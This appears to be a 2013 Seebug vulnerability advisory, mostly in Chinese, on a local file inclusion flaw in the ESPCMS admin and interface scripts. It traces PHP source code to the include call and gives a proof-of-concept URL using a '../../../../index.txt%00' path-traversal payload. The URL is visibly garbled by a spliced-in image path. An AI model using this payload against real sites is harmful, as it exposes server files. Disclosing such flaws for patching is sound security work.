ESPCMS Local File Inclusion Vulnerability

2013-04-08T00:00:00
ID SSV:94417
Type seebug
Reporter Root
Modified 2013-04-08T00:00:00

Description

简要描述:

包含

详细说明:

adminsoft/index.php

$archive = indexget('archive', 'R'); $archive = empty($archive) ? 'adminuser' : $archive; $action = indexget('action', 'R'); $action = empty($action) ? 'login' : $action; include admin_ROOT . adminfile . "/control/$archive.php";// 包含产生 good nice $control = new important(); $action = 'on' . $action; if (method_exists($control, $action)) { $control->$action(); } else { exit('错误:系统方法错误!'); }

首先看index.php 02 ///省略无关代码 03 $archive = indexget('ac', 'R'); //ac 04 $action = indexget('at', 'R'); //at 05 ///省略无关代码 06 if (empty($archive) || empty($action)) { 07 include admin_ROOT . 'interface/public.php'; 08 $mainlist = new mainpage(); 09 if (method_exists($mainlist, 'in_index')) { 10 $mainlist->in_index(); 11 } else { 12 exit('Access error!'); 13 } 14 } else { 15 if (in_array($archive, array('article', 'forum', 'search', 'bbssearch', 'forummain', 'messmain', 'special', 'respond', 'public', 'scriptout', 'enquiry', 'enquirymain', 'form', 'formmain', 'ordermain', 'membermain', 'member', 'forum', 'order'))) { //强制,首页包含木有了 16 $action = 'in_' . $action; /in_$ 函数 17 if (!file_exists(admin_ROOT . "interface/$archive.php")) { //跟进 18 exit('Access error!'); 19 } 20 include admin_ROOT . "interface/$archive.php"; 21 $mainlist = new mainpage(); 22 if (method_exists($mainlist, $action)) { 23 $mainlist->$action(); 24 } else { 25 exit('Access error!'); 26 } 27 } else { 28 exit('Access error!'); 29 } 30 } 31 ///省略无关代码 32 跟进到interface/enquity文件 33 ///省略无关代码 34 $filename = $this->fun->accept('filename', 'G'); //filename变量 35 $filename = empty($filename) ? 'list' : $filename; 36 ///省略无关代码 37 $output = $this->pagetemplate->fetch($lng . '/lib/' . $filename); ' 38 ///省略无关代码 39 ///跟进函数库查看 40 function fetch($tpl_file, $cache_fileID = null, $outHTML = null) { 41 if (!empty($outHTML)) { 42 $out = $this->gettemprequire($outHTML); 43 return $out; 44 } 45 require_once 'ectemplates_parser.php'; 46 47 if ($this->libfile) { 48 $tpl_file = $this->templatesDIR . $tpl_file . '.html'; //html 49 } 50 51 $template_file = $this->tpl_dir . $tpl_file; 52 53 $parsed_file = $this->tpl_c_dir . md5($tpl_file) . '.php'; 54 55 http://127.0.0.1/espcms_utf8_5.6.13.03.14_bhttps://images.seebug.org/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00

漏洞证明:

http://127.0.0.1/espcms_utf8_5.6.13.03.14_bhttps://images.seebug.org/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00